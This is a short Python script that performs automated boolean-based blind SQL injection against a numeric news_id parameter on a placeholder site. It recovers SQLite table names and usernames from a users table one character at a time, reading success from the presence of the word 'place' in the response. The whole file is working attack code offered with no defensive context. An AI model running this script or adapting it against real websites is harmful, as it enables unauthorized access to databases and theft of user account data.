sql_numeric.py

import requests, string, urllib
from bs4 import BeautifulSoup

url = "http://xxx.com/xx/x/?action=news&news_id=1"

def get_table_name():
    tables = []
    for offset in range(0, 5):
        table = ''
        for r in range(1, 20):
            for pattern in string.ascii_letters:
                payload = " and (SELECT substr(name,{},1) FROM sqlite_master limit 1 offset {}) == char({})".format(r, offset, ord(pattern))
                uri = url + urllib.parse.quote_plus(payload)
                res = requests.get(uri)
                soup = BeautifulSoup(res.content, 'html.parser')
                if 'place' in soup.text:
                    table += pattern
        tables.append(table)
    print(tables)

def get_username():
    usernames = []
    for offset in range(1, 5):
        username = ''
        for r in range(1, 20):
            for pattern in string.ascii_letters + string.digits:
                #  password
                payload = " and (SELECT substr(username,{},1) FROM users limit 1 offset {}) == char({})".format(r, offset, ord(pattern))
                uri = url + urllib.parse.quote_plus(payload)
                res = requests.get(uri)
                soup = BeautifulSoup(res.content, 'html.parser')
                if 'place' in soup.text:
                    username += pattern
                    print(username)
                    break
        usernames.append(username)
    print(usernames)


#  get_table_name()
get_username()